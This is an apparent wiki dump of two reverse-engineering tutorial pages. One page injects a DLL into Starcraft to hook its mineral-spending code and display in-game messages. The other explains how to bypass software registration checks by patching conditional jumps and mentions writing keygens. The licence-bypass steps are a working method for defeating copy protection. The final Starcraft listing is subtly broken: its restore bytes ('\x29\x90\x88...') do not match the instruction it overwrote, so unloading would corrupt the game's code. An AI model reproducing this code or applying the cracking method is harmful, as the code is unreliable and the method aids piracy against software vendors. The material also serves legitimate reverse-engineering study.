In IDA, load Starcraft.exe and wait till it finishes analysis. Then go to the strings window/tab and search (by typing it in) for "[", and the first result is "[%s] %s: %s". Anybody who knows C format strings will know that, in a format specifier, %s indicates a string. Since we have a reasonable idea of how strings work, we can guess that "%s: %s" would be a normal message, so we search for that and double-click it. <br />
<br />
The address of that string should be 0x004F2AE0. If it's not, you might be on the wrong version of Starcraft, which should be fine. Just remember that the addresses I provide may not be right. <br />
<br />
On that address, press ctrl-x. There's only one cross reference, at sub_004696C0+105, so double-click that. We see that this string is a parameter to a function call, shown here:<br />
push eax<br />
push offset aSS_2<br />
push 100h<br />
push ecx<br />
call sub_4D2820<br />
<br />
Anybody well-versed in C will likely recognize this as a call to snprintf(). The first parameter, ecx, is the buffer. Then 100h is the length, aSS_2 ("%s: %s") is the format string, and the two strings that are substituted for %s are eax and (not shown here) edi. <br />
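<br />
For comparison, this is roughly what the equivalent C looks like. It is a sketch using the standard snprintf(), on the assumption that sub_4D2820 behaves the same way; the wrapper name format_chat_line is hypothetical. <br />
```c
#include <assert.h>
#include <stdio.h>

/* Formats "name: text" into buffer, writing at most size bytes including
 * the terminating NUL. Returns what snprintf() returns. */
int format_chat_line(char *buffer, size_t size, const char *name, const char *text)
{
    assert(buffer != NULL && size > 0);
    return snprintf(buffer, size, "%s: %s", name, text);
}
```
Note how the arguments line up with the pushes when read in reverse: the buffer (ecx) is pushed last, the size (100h) before it, then the format string, then the first of the two strings. <br />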
<br />
Since ecx is a volatile register, it's likely going to change after the function call, which means that this code won't rely on its value. If we look above, we can find where ecx is loaded with the buffer:<br />
lea ecx, [esp+110h+var_100] <br />
Note that the frame pointer isn't being used here, but that IDA still managed to name the local variable. Click on var_100, press 'n', and call it 'buffer'. <br />
<br />
On the line before, you should see:<br />
lea eax, dword_6509E3[esi]<br />
This is the first string parameter that will be substituted, which means it corresponds to the first %s, which is the player's name. Presumably "esi" is the player number. This will be important later. <br />
<br />
Click on the "buffer" variable you defined to highlight all instances of it, then scroll down. You'll eventually see the buffer put into ecx right before a function call, which indicates a __fastcall function. If you double-click on that function and scroll way down to the bottom, you'll find the return is:<br />
retn 8<br />
So now we know that it's a __fastcall with two stack parameters, so a total of four parameters. <br />
<br />
Press "Esc" to get back. <br />
<br />
Looking at edx, we see that it gets its value from ebx, and involves a subtraction. If you follow ebx up the function, you'll see that esi is derived from it, so presumably ebx is or involves the player number. For now, we'll ignore that, and set it to 0. <br />
<br />
The first stack parameter (that is, the last one pushed) is "eax". Remember that eax is the return variable. The function GetTickCount() is called just above the push, then 0x1B58 is added to the result. Right-click on the 0x1B58 to see the variable in different forms. In decimal, it's "7000". That's a much better number, so click on that. <br />
<br />
GetTickCount() returns the number of milliseconds that Windows has been running. Adding 7000 milliseconds, or 7 seconds, creates the time it will be in 7 seconds. Messages in Starcraft stay on the screen for roughly 7 seconds, so presumably this parameter is the time for a message to stop displaying. <br />
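<br />
The arithmetic is simple enough to sketch. Here now_ms stands in for whatever GetTickCount() would return, and display_until is a made-up name; the only real assumption is that the tick count is an unsigned 32-bit number, so the addition wraps around rather than overflowing. <br />
```c
#include <assert.h>
#include <stdint.h>

/* Returns the tick count at which a message shown at now_ms should
 * disappear, given a duration in seconds. */
uint32_t display_until(uint32_t now_ms, uint32_t seconds)
{
    assert(seconds <= UINT32_MAX / 1000);
    return now_ms + seconds * 1000u;   /* unsigned, so it wraps like the tick counter */
}
```
With seconds set to 7 this adds 7000, which is the 0x1B58 seen in the disassembly. <br />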
<br />
Finally, the last stack parameter is 0. That's nice and easy! <br />
<br />
As for the return value, eax isn't used after the function call, so there may not be a return value. We won't worry about it. <br />
<br />
So now we can define the function this way:<br />
void __fastcall DisplayMessage(char *strMessage, int unknown, DWORD dwDisplayUntil, int unknown0);<br />
<br />
It's not necessary here, but for education, do the following:<br />
* Double-click on the display function (sub_469380)<br />
* Scroll up, and click on the function's name<br />
* Press 'n', and call it 'DisplayMessage'<br />
* Press 'y', and define it as shown above (don't forget the semicolon).<br />
* Press 'Esc' to get back to where the function is called. <br />
<br />
If you're using a modern version of IDA (support for __fastcall started fairly late), you'll see that the parameters to this function are commented now. <br />
<br />
Of course, we have to test it works, now. We already have a .dll that can be loaded, so we'll add a function to it. Here's the function:<br />
<br />
<pre><br />
void __stdcall DisplayMessage(char *strMessage, int intDurationInSeconds)<br />
{<br />
int intDisplayUntil = GetTickCount() + (intDurationInSeconds * 1000);<br />
int fcnDisplayMessage = 0x469380;<br />
<br />
__asm<br />
{<br />
push 0<br />
push intDisplayUntil<br />
mov edx, 0<br />
mov ecx, strMessage<br />
call fcnDisplayMessage<br />
}<br />
}<br />
</pre><br />
<br />
Then to test, add a call to this function from DLL_PROCESS_ATTACH in DllMain(), and you're ready to test your first hack! <br />
<br />
To test this: <br />
* Run Starcraft<br />
* Start a single player game (if you had the newest version, this would work in multiplayer too)<br />
* Alt-tab out<br />
* Run injector.exe<br />
* Tell it to inject in the "Starcraft" window, and give it the full path to the .dll file<br />
* Press "Inject"<br />
* Go back into the game<br />
* Hopefully your message will be waiting! <br />
<br />
[[Example_7_Step_1|Click here]] for the full code. <br />
<br />
Another option that I've started using more recently is to use a function pointer:<br />
<pre><br />
typedef void (__fastcall *fcnShowMessage) (const char* strMessage, int unk, int intDisplayUntil, int unk0);<br />
static const fcnShowMessage ShowMessage = (fcnShowMessage) 0x00469380;<br />
</pre><br />
<br />
[[Example_7_Step_1b|Click here]] for the full code using a function pointer. <br />
<br />
<br />
== Mineral Spending ==<br />
<br />
We're going to use TSearch to track down the function called when a user spends minerals. <br />
<br />
This is very simple to do, and requires only a memory search (with TSearch) on the address of your minerals. That will lead you back to the code that can be patched, which means your hack will know every time minerals are spent. You should be able to do this on your own, based on what you learned in "Memory Searching", but here's the Starcraft-specific way:<br />
<br />
* Start a game of Starcraft against the computer, but don't start mining. <br />
* Alt-tab out, run TSearch, and attach it to Starcraft. <br />
* Search (in the left pane) for "50", 4 bytes (minerals can go over 65000). <br />
* Go back to the game, and mine one chunk of minerals. <br />
* Go back to TSearch, and search for "58". <br />
* Go to Starcraft and buy an SCV/Drone/Probe. <br />
* Go back to TSearch and search for "8"<br />
* Repeat until you're down to two or three results<br />
* Test the one at address 0x006xxxxx by changing it, go back to the game, and watch your minerals fall back to where they were. If you don't see one at this address, don't worry. It's only the display number. <br />
* Test the one at 0x004xxxxx, and watch your minerals stay constant. <br />
* Double-click on the good value<br />
* Under the "AutoHack" menu choose "Enable Debugger"<br />
* Right-click on the row in the right pane, and click "AutoHack"<br />
* Under the "AutoHack" menu, choose "AutoHack Window"<br />
* Go back into the game, and spend some minerals<br />
* Take a look at the "AutoHack Window", you should see exactly one result. If you harvested some money first, you'll see more, but use the last one. <br />
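<br />
The narrowing-down that the steps above rely on can be sketched in C. This is not TSearch's actual code; it is a guess at the general technique, run over an ordinary buffer instead of another process's memory, and it only checks 4-byte-aligned offsets. The names first_scan and next_scan are made up. <br />
```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* First pass: records every 4-byte-aligned offset in mem whose value
 * equals target. Returns the number of hits stored in hits[]. */
size_t first_scan(const unsigned char *mem, size_t len, uint32_t target,
                  size_t *hits, size_t max_hits)
{
    size_t off, n = 0;
    uint32_t v;

    assert(mem != NULL && hits != NULL);
    for (off = 0; off + sizeof v <= len && n < max_hits; off += sizeof v) {
        memcpy(&v, mem + off, sizeof v);
        if (v == target)
            hits[n++] = off;
    }
    return n;
}

/* Later passes: keeps only the earlier hits whose value now equals
 * target. Returns the number of hits that remain. */
size_t next_scan(const unsigned char *mem, uint32_t target,
                 size_t *hits, size_t n)
{
    size_t i, kept = 0;
    uint32_t v;

    assert(mem != NULL && hits != NULL);
    for (i = 0; i < n; i++) {
        memcpy(&v, mem + hits[i], sizeof v);
        if (v == target)
            hits[kept++] = hits[i];
    }
    return kept;
}
```
Each search for a new value (50, then 58, then 8) throws away every address that didn't change the way the mineral count did, which is why a handful of rounds is usually enough. <br />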
<br />
By now, you should have determined that your minerals are stored at or near 0x004FEE5C, and the address where the minerals changed should be 0x0040208F. <br />
<br />
So load up Starcraft.exe in IDA and jump down to 0x0040208F. You should see a function that looks like this (I've indicated the line where your minerals are written):<br />
<br />
<pre><br />
.text:00402070 51 push ecx<br />
.text:00402071 88 4C 24 00 mov byte ptr [esp+1+var_1], cl<br />
.text:00402075 8B 44 24 00 mov eax, [esp+1+var_1]<br />
.text:00402079 25 FF 00 00 00 and eax, 0FFh<br />
.text:0040207E C1 E0 02 shl eax, 2<br />
.text:00402081 8B 88 58 65 51 00 mov ecx, dword_516558[eax]<br />
.text:00402087 8B 90 58 EE 4F 00 mov edx, dword_4FEE58[eax]<br />
.text:0040208D 2B D1 sub edx, ecx<br />
.text:0040208F 89 90 58 EE 4F 00 mov dword_4FEE58[eax], edx ; <-- This line<br />
.text:00402095 8B 90 B8 65 51 00 mov edx, dword_5165B8[eax]<br />
.text:0040209B 29 90 88 EE 4F 00 sub dword_4FEE88[eax], edx<br />
.text:004020A1 59 pop ecx<br />
.text:004020A2 C3 retn<br />
</pre><br />
<br />
This function is pretty straightforward, although it does something weird: it preserves ecx. I don't know why that happens. <br />
<br />
On the second line, cl (part of ecx) is used, so we know this is __fastcall. edx is overwritten, so we know that this function has one parameter. Note that the one parameter is used as an array index into the array that stores your mineral count. It is pretty safe to assume that this parameter is the player number. <br />
<br />
To summarize this function:<br />
* Store ecx's lowest byte in var_1<br />
* Get rid of the top 3 bytes of eax (if the mov had been movzx, this would have automatically happened). <br />
* Shift eax two bits left. This has the same effect as multiplying by 4, which likely means it's an index into an array of 4-byte values<br />
* Use eax as an index into two arrays, and subtract them from each other. We know the first is our minerals, the second is unknown, but it should be obvious that the second is the amount you're spending. <br />
* Put the new value, after the subtraction, back into the array. <br />
* Move another variable into edx, and subtract it from yet another variable. <br />
<br />
The usage of this function is pretty obvious, so we can go ahead and write the patch! <br />
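<br />
Before patching, it can help to write the function back out as C. This is only my reading of the disassembly: the array names are made up (IDA only gives us dword_4FEE58, dword_516558, dword_4FEE88 and dword_5165B8), and the length of 12 is a guess based on the two totals arrays being 0x30 bytes apart. <br />
```c
#include <assert.h>
#include <stdint.h>

#define MAX_PLAYERS 12   /* assumed: 0x4FEE88 - 0x4FEE58 = 0x30 bytes = 12 dwords */

static int32_t minerals[MAX_PLAYERS];       /* stands in for dword_4FEE58 */
static int32_t mineral_cost[MAX_PLAYERS];   /* stands in for dword_516558 */
static int32_t other_total[MAX_PLAYERS];    /* stands in for dword_4FEE88 */
static int32_t other_cost[MAX_PLAYERS];     /* stands in for dword_5165B8 */

/* ecx is the single __fastcall parameter; only its low byte (cl) is used. */
void spend(uint32_t ecx)
{
    uint32_t player = ecx & 0xFF;   /* the "and eax, 0FFh" */

    assert(player < MAX_PLAYERS);
    /* The "shl eax, 2" is implicit here: C scales the index by 4 for us. */
    minerals[player]    -= mineral_cost[player];
    other_total[player] -= other_cost[player];
}
```
If minerals[1] is 58 and mineral_cost[1] is 50, calling spend(1) leaves 8, which matches what we saw in the game. <br />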
<br />
== The Wrapper == <br />
<br />
The best place I see to patch is right after 0x0040208F. At this point, the variables all contain useful values:<br />
* eax = 4 * player number<br />
* ecx = the amount spent<br />
* edx = the new mineral total<br />
<br />
Here's the patch we want to make, and I've assigned everything machine code from a handy dandy reference (IDA):<br />
89 90 58 EE 4F 00 mov dword_4FEE58[eax], edx ; The overwritten code<br />
60 pushad ; Preserve<br />
52 push edx ; Push the three parameters<br />
51 push ecx<br />
50 push eax<br />
e8 xx xx xx xx call HackFunction ; Note that this is __stdcall<br />
61 popad<br />
c3 ret<br />
<br />
Or, in a C string:<br />
char *wrapper = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3"; <br />
<br />
== The Patch ==<br />
<br />
This is mostly taken from the section on .dll injection, with a small modification to the machine code wrapper to add some pushes, and to the hack function to support the three parameters:<br />
<br />
<pre><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <windows.h><br />
<br />
void __stdcall HackFunction(int player, int spent, int remaining)<br />
{<br />
}<br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
/* This is the address in the game where the patch is going */<br />
int intAddressToPatch = 0x0040208F;<br />
<br />
/* This creates the wrapper, leaving an "????" where the call distance will be inserted. */<br />
static char strWrapper[] = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3";<br />
<br />
/* This sets the "????" in the string to the distance from the byte immediately after the ????<br />
* (15 bytes from the beginning of the string) to HackFunction. The ???? itself starts 11 bytes<br />
* from the beginning of the string. */<br />
*((int*)(strWrapper + 11)) = ((int) &HackFunction) - ((int) strWrapper + 15); <br />
<br />
/* This is the actual patch */<br />
char strPatch[] = "\xe8????\x90";<br />
<br />
/* This replaces the ???? with the distance from the patch to the wrapper. 5 is added because that's <br />
* the length of the call instruction (e8 xx xx xx xx) and the distance is relative to the byte <br />
* after the call. */<br />
*((int*)(strPatch + 1)) = ((int) &strWrapper) - (intAddressToPatch + 5);<br />
<br />
/* This is the original buffer, used when the .dll is removed (to restore the program's original <br />
* functionality) */<br />
char *strUnPatch = "\x89\x90\x58\xee\x4f\x00";<br />
<br />
/* The process handle is required to write */<br />
HANDLE hProcess = GetCurrentProcess();<br />
<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strPatch, 6, NULL);<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strUnPatch, 6, NULL);<br />
break;<br />
}<br />
return TRUE;<br />
}<br />
<br />
</pre><br />
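<br />
The distance calculation is the part that's easiest to get wrong, so here it is on its own. This is a sketch with a made-up function name, make_call; it builds the five bytes of a relative call (opcode e8) for a given call site and target, writing the distance byte by byte in little-endian order. <br />
```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Builds a 5-byte "call rel32" that, when placed at address site, calls
 * target. The distance is measured from the byte after the call. */
void make_call(unsigned char out[5], uint32_t site, uint32_t target)
{
    uint32_t rel = target - (site + 5);

    assert(out != NULL);
    out[0] = 0xE8;
    out[1] = (unsigned char) (rel & 0xFF);
    out[2] = (unsigned char) ((rel >> 8) & 0xFF);
    out[3] = (unsigned char) ((rel >> 16) & 0xFF);
    out[4] = (unsigned char) ((rel >> 24) & 0xFF);
}
```
As a sanity check against real code: the game's own call to sub_4D2820 sits at 0x004697D0, and make_call(out, 0x004697D0, 0x004D2820) produces e8 4b 90 06 00, the same bytes IDA shows for that instruction. <br />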
<br />
== Add the Display Function ==<br />
I wrote the function to display text earlier on this page. Now would be a good time to add that to the project. At the same time, add a few calls to it that'll display what's going on:<br />
<br />
<pre><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <windows.h><br />
<br />
void __stdcall DisplayMessage(char *strMessage, int intDurationInSeconds)<br />
{<br />
int intDisplayUntil = GetTickCount() + (intDurationInSeconds * 1000);<br />
int fcnDisplayMessage = 0x469380;<br />
<br />
__asm<br />
{<br />
push 0<br />
push intDisplayUntil<br />
mov edx, 0<br />
mov ecx, strMessage<br />
call fcnDisplayMessage<br />
}<br />
}<br />
<br />
void __stdcall HackFunction(int player, int spent, int remaining)<br />
{<br />
char buffer[200];<br />
<br />
player = player >> 2;<br />
sprintf_s(buffer, 200, "\x04Player %d spent \x02%d \x04minerals, leaving him with %d", player, spent, remaining);<br />
DisplayMessage(buffer, 5);<br />
}<br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
/* This is the address in the game where the patch is going */<br />
int intAddressToPatch = 0x0040208F;<br />
<br />
/* This creates the wrapper, leaving an "????" where the call distance will be inserted. */<br />
static char strWrapper[] = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3";<br />
<br />
/* This sets the "????" in the string to the distance from the byte immediately after the ????<br />
* (15 bytes from the beginning of the string) to HackFunction. The ???? itself starts 11 bytes<br />
* from the beginning of the string. */<br />
*((int*)(strWrapper + 11)) = ((int) &HackFunction) - ((int) strWrapper + 15); <br />
<br />
/* This is the actual patch */<br />
char strPatch[] = "\xe8????\x90";<br />
<br />
/* This replaces the ???? with the distance from the patch to the wrapper. 5 is added because that's <br />
* the length of the call instruction (e8 xx xx xx xx) and the distance is relative to the byte <br />
* after the call. */<br />
*((int*)(strPatch + 1)) = ((int) &strWrapper) - (intAddressToPatch + 5);<br />
<br />
/* This is the original buffer, used when the .dll is removed (to restore the program's original <br />
* functionality) */<br />
char *strUnPatch = "\x89\x90\x58\xee\x4f\x00";<br />
<br />
/* The process handle is required to write */<br />
HANDLE hProcess = GetCurrentProcess();<br />
<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Attached!", 10);<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strUnPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Removed!", 10);<br />
break;<br />
}<br />
return TRUE;<br />
}<br />
</pre><br />
<br />
== Finishing Touches ==<br />
That function will display a nice notification when a player spends minerals, but only the numeric player number is given, which isn't especially helpful. <br />
<br />
Recall that, while looking for the display function, we found the array of player names. Here's the code that prepares the message:<br />
.text:004697BA 8D 86 E3 09 65 00 lea eax, dword_6509E3[esi]<br />
.text:004697C0 8D 4C 24 10 lea ecx, [esp+110h+buffer]<br />
.text:004697C4 50 push eax<br />
.text:004697C5 68 E0 2A 4F 00 push offset aSS_2 ; "%s: %s"<br />
.text:004697CA 68 00 01 00 00 push 100h ; size_t<br />
.text:004697CF 51 push ecx ; char *<br />
.text:004697D0 E8 4B 90 06 00 call sub_4D2820<br />
<br />
The first parameter is ecx, which is an empty buffer. The second parameter, 0x100, is the size of the buffer. The third parameter is the format string, "%s: %s", indicating that the last two parameters are the username and the message. <br />
<br />
The fourth parameter is eax. The eax comes from dword_6509E3[esi], which means that esi is indexing into an array in memory. So from there, we can look above and figure out where esi came from:<br />
.text:00469749 8D 34 DB lea esi, [ebx+ebx*8]<br />
.text:0046974C C1 E6 02 shl esi, 2<br />
<br />
Going to the top of the function, we see that ebx was a parameter, and is compared to 8. Since a Starcraft game can have up to 8 players, it's reasonable to assume that ebx is the player number. Therefore, we need to emulate these three lines:<br />
.text:00469749 8D 34 DB lea esi, [ebx+ebx*8]<br />
.text:0046974C C1 E6 02 shl esi, 2<br />
.text:004697BA 8D 86 E3 09 65 00 lea eax, dword_6509E3[esi]<br />
<br />
Which can easily be done like this:<br />
int esi = ebx + ebx*8;<br />
esi = esi << 2;<br />
char *player = (char*) 0x6509e3 + esi; <br />
<br />
The first line multiplies the player number by 9, and the next line shifts it left by 2, which is the same as multiplying by 4. Since 9 * 4 = 36, the three lines reduce to simply:<br />
char *player = (char*) 0x6509e3 + (playernum * 36); <br />
Recall that, in the assembly function, the player number is shifted left twice. That means that, to get the proper number here, we have to right-shift it twice before we use it:<br />
char *player = (char*) 0x6509e3 + ((playernum >> 2) * 36); <br />
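<br />
As a quick sanity check of that arithmetic, here is a minimal sketch in C. The function names are my own (they don't exist in the game), and it only computes addresses; it never dereferences them:<br />

```c
#include <stdint.h>

/* Mirrors "lea esi, [ebx+ebx*8]" followed by "shl esi, 2". */
uint32_t name_offset_asm(uint32_t ebx)
{
    uint32_t esi = ebx + ebx * 8; /* ebx * 9 */
    esi <<= 2;                    /* times 4, so ebx * 36 in total */
    return esi;
}

/* The reduced form: each name slot is 36 bytes wide. */
uint32_t name_offset(uint32_t playernum)
{
    return playernum * 36;
}

/* Address of the name for a player number that arrives already shifted
 * left by 2, as described above. 0x6509e3 is the array base from the
 * disassembly. */
uint32_t name_address(uint32_t shifted_player)
{
    return 0x6509e3u + name_offset(shifted_player >> 2);
}
```

Both forms agree for every player number, which is all the reduction claims.<br />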
<br />
Adding that to our code, we get this completed hack:<br />
<pre><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <windows.h><br />
<br />
/* This function displays a message on the screen for the specified number of seconds. */<br />
void __stdcall DisplayMessage(char *strMessage, int intDurationInSeconds)<br />
{<br />
int intDisplayUntil = GetTickCount() + (intDurationInSeconds * 1000);<br />
int fcnDisplayMessage = 0x469380;<br />
<br />
__asm<br />
{<br />
push 0<br />
push intDisplayUntil<br />
mov edx, 0<br />
mov ecx, strMessage<br />
call fcnDisplayMessage<br />
}<br />
}<br />
<br />
/* This function is called whenever a player spends money. */<br />
void __stdcall HackFunction(int player, int spent, int remaining)<br />
{<br />
char buffer[200];<br />
/* This address is an array of names. Recall that the player is left-shifted twice in the "SpendMoney" function, so<br />
* the shift here ends up with the same number. */<br />
char *name = (char*) 0x6509e3 + ((player >> 2) * 36); <br />
<br />
/* Create a string to display, then display it. */<br />
sprintf_s(buffer, 200, "\x04%s spent \x02%d \x04minerals, leaving him with %d", name, spent, remaining);<br />
DisplayMessage(buffer, 5);<br />
}<br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
/* This is the address in the game where the patch is going */<br />
int intAddressToPatch = 0x0040208F;<br />
<br />
/* This creates the wrapper, leaving an "????" where the call distance will be inserted. */<br />
static char strWrapper[] = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3";<br />
<br />
/* This sets the "????" in the string to the distance from the byte immediately after the ???? to HackFunction.<br />
* The ???? starts 11 bytes from the beginning of the string, so the byte after it (which is what the<br />
* relative distance is measured from) is 15 bytes from the beginning. */<br />
*((int*)(strWrapper + 11)) = ((int) &HackFunction) - ((int) strWrapper + 15); <br />
<br />
/* This is the actual patch */<br />
char strPatch[] = "\xe8????\x90";<br />
<br />
/* This replaces the ???? with the distance from the patch to the wrapper. 5 is added because that's <br />
* the length of the call instruction (e8 xx xx xx xx) and the distance is relative to the byte <br />
* after the call. */<br />
*((int*)(strPatch + 1)) = ((int) &strWrapper) - (intAddressToPatch + 5);<br />
<br />
/* This is the original buffer, used when the .dll is removed (to restore the program's original <br />
* functionality) */<br />
char *strUnPatch = "\x29\x90\x88\xee\x4f\x00";<br />
<br />
/* The process handle is required to write */<br />
HANDLE hProcess = GetCurrentProcess();<br />
<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Attached!", 10);<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strUnPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Removed!", 10);<br />
break;<br />
}<br />
return TRUE;<br />
}<br />
</pre><br />
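<br />
The two "????" calculations in DllMain both follow the same rule: the value stored after an e8 opcode is the target address minus the address of the byte after the call. Here is a small sketch of that rule on its own. The function names are mine, and the 0x10001000 target in the usage note is a made-up address, not one from the game:<br />

```c
#include <stdint.h>

/* Displacement stored after an E8 (call rel32) opcode. The CPU measures
 * it from the end of the 5-byte instruction. */
int32_t call_rel32(uint32_t call_site, uint32_t target)
{
    return (int32_t)(target - (call_site + 5));
}

/* Writes the 5-byte call instruction: E8 followed by the displacement
 * in little-endian byte order. */
void encode_call(uint8_t out[5], uint32_t call_site, uint32_t target)
{
    uint32_t rel = (uint32_t)call_rel32(call_site, target);

    out[0] = 0xE8;
    out[1] = (uint8_t)(rel & 0xFF);
    out[2] = (uint8_t)((rel >> 8) & 0xFF);
    out[3] = (uint8_t)((rel >> 16) & 0xFF);
    out[4] = (uint8_t)((rel >> 24) & 0xFF);
}
```

For example, a call placed at 0x0040208F that targets a hypothetical wrapper at 0x10001000 would be encoded as e8 6c ef bf 0f. The plugin above follows those five bytes with a nop because the instruction it overwrites is six bytes long.<br />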
<br />
== In Action! ==<br />
Here's a screenshot of the plugin in action:<br />
<br />
[[image:screenshot.jpg]]<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Cracking_a_Game&diff=3163Cracking a Game2012-01-16T22:59:22Z<p>Killboy: /* Finding the Spot */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over several techniques used by crackers to register games/software. I don't mention cd-cracks, because I don't know how to do those; rather, I mention attacks that are generally based on a key or registration code. <br />
<br />
== Common Protections ==<br />
<br />
The most common protection, and the one discussed here, is when a program requires a registration key to unlock. Usually, the key is based either on a random registration code provided by the program, or based on the username you enter. <br />
<br />
I'll list some definitions here. Note that these definitions are mine, and won't necessarily correspond to definitions others use. These are simply to make it easier to understand this and the following sections:<br />
* A '''''registration code''''' is a code generated by a program, that the registration key is derived from or checked against.<br />
* A '''''registration username''''' or just username is a username that a user enters. The registration key is based on that username. <br />
* A '''''registration key''''' is the key used to unlock a program. It may be based on a registration code, on a registration username, or based on nothing at all. <br />
<br />
<br />
== Finding the Spot ==<br />
<br />
The very first example goes over Starcraft's CDKey verification algorithm, but I provided the algorithm. Starcraft's is the simplest kind of verification: the key verifies itself without a username or code. The question is, how do you find the algorithm?<br />
<br />
Well, the unfortunate answer is, it varies, and it generally isn't easy. <br />
<br />
The first step is obviously to disassemble the program. After that, as a cracker, you have to try and find a weak point in the program. Here are several techniques:<br />
* Search for the text prompting for the key<br />
* Search for the registration code in memory, and find out where it's accessed<br />
* Enter a code, have it fail, then search memory for that failed code<br />
* Search for anything unique about the registration (colors, text, dialogs, etc).<br />
* Search for the registry key that stores the key<br />
* Search for a file that stores registration information<br />
* Search for the error message when a bad key is given<br />
<br />
The last technique is the most useful one, I've found. However, trying them all, and trying anything else that seems to suit the game works best. In the example in the next section, I found that searching for the text informing the user that the software is unregistered worked well for the game, as you'll see later. I may do a second example where I searched for the file that stored the key, and where it was created. <br />
<br />
To find Starcraft's CDKey verifier, I started with the network traffic, at the Winsock functions (send() and recv()). From there, I backtracked to find where the packet is sent that validates the Starcraft key with Battle.net. It was a lot of work, but at the time I was learning about Starcraft's network activity so it was mostly a side-effect of what I was already doing. If I continue writing these tutorials, I might eventually get into that much detail, but I have no plans to yet.<br />
<br />
== Cracking the Game ==<br />
Once the right spot is found, cracking a game is often very easy. Typically, a program will have the following code:<br />
<pre><br />
if(keyIsValid)<br />
unlock()<br />
else<br />
displayError()<br />
</pre><br />
<br />
The assembly for that would look like:<br />
85 xx test keyIsValid, keyIsValid<br />
74 07 jz error<br />
e8 xx xx xx xx call unlock<br />
eb 05 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
As discussed in the section on machine code, the bytes to the left are the machine code bytes (I did them quickly from a reference sheet, so they may or may not be exactly correct). This program can be modified by changing a couple of bytes, which can either force the code to always jump or never jump.<br />
<br />
To force the code to jump (which, in this case, will make the key always invalid), the jz is replaced with a jmp (by changing 74 to eb):<br />
85 xx test keyIsValid, keyIsValid<br />
eb 07 jmp error<br />
e8 xx xx xx xx call unlock<br />
eb 05 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
To prevent the code from jumping (which, in this case, will make the key always valid), the jz is replaced with a pair of nop instructions:<br />
85 xx test keyIsValid, keyIsValid<br />
90 nop<br />
90 nop<br />
e8 xx xx xx xx call unlock<br />
eb 05 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
Make the appropriate change, run the game, and type in any code. The expected result should occur! <br />
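<br />
To make the two patches concrete, here is a minimal sketch that applies them to a plain byte array rather than to a real program. The function names are mine. In the usage note, the buffer is my own encoding of the snippet above, with 85 c0 standing in for the test and the call targets left as zeros:<br />

```c
#include <stddef.h>
#include <stdint.h>

enum { OP_JZ_SHORT = 0x74, OP_JMP_SHORT = 0xEB, OP_NOP = 0x90 };

/* Turns "jz rel8" into "jmp rel8" so the branch is always taken.
 * Returns 1 on success, 0 if there is no jz at that offset. */
int force_jump(uint8_t *code, size_t len, size_t off)
{
    if (off + 2 > len || code[off] != OP_JZ_SHORT)
        return 0;
    code[off] = OP_JMP_SHORT; /* the displacement byte stays the same */
    return 1;
}

/* Replaces the 2-byte "jz rel8" with two nops so the branch is never taken.
 * Returns 1 on success, 0 if there is no jz at that offset. */
int remove_jump(uint8_t *code, size_t len, size_t off)
{
    if (off + 2 > len || code[off] != OP_JZ_SHORT)
        return 0;
    code[off] = OP_NOP;
    code[off + 1] = OP_NOP;
    return 1;
}
```

With a buffer of 85 c0 74 07 e8 00 00 00 00 eb 05 e8 00 00 00 00, calling remove_jump(buf, 16, 2) leaves 90 90 where the jz was, so execution falls straight through to the call to unlock. Both functions refuse to patch if the byte at the offset isn't 74, which is a cheap guard against patching the wrong spot.<br />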
<br />
The next example will show this on an actual game (on a game that I won't name here, for obvious reasons). <br />
<br />
== Writing a Keygen ==<br />
Even better than cracking a game is writing a keygen for it. The user enters their username or registration code, and the keygen outputs a valid key. <br />
<br />
Generally, this requires that the algorithm be fully reverse engineered and understood. Then a copy of it is made in C (or whatever language) which produces the same results. Note that the first three examples in this tutorial do just that: turning the assembly code back into C. So anybody who actually followed them should be in a good position to write a keygen, which will come in a later tutorial. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Cracking_a_Game&diff=3162Cracking a Game2012-01-16T22:56:37Z<p>Killboy: </p>
<hr />
